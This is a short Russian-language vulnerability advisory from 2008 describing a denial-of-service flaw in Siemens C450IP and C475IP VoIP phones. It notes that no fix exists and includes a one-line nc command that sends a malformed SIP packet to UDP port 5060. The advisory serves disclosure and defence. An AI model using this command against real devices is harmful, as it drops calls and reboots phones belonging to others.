Отказ в обслуживании в Siemens C450IP и C475IP

Дата публикации:
01.12.2008
Всего просмотров:
2271
Опасность:
Средняя
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Локальная сеть
Воздействие:
Отказ в обслуживании
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Siemens C450IP
Siemens C475IP
Уязвимые версии:
Siemens C450IP
Siemens C475IP

Описание:
Уязвимость позволяет удаленному пользователю произвести DoS атаку.

Уязвимость существует из-за ошибки при обработке SIP сообщений. Удаленный пользователь может отправит специально сформированный UDP пакет на порт 5060, отключить все текущие звонки и перезагрузить устройство. Пример:

echo -e "X sip:s X\nFrom:<sip:@x>\nTo:<sip:@x>\n" | nc -q0 -u <target> 5060

URL производителя: www.siemens.com

Решение: Способов устранения уязвимости не существует в настоящее время.

или введите имя

CAPTCHA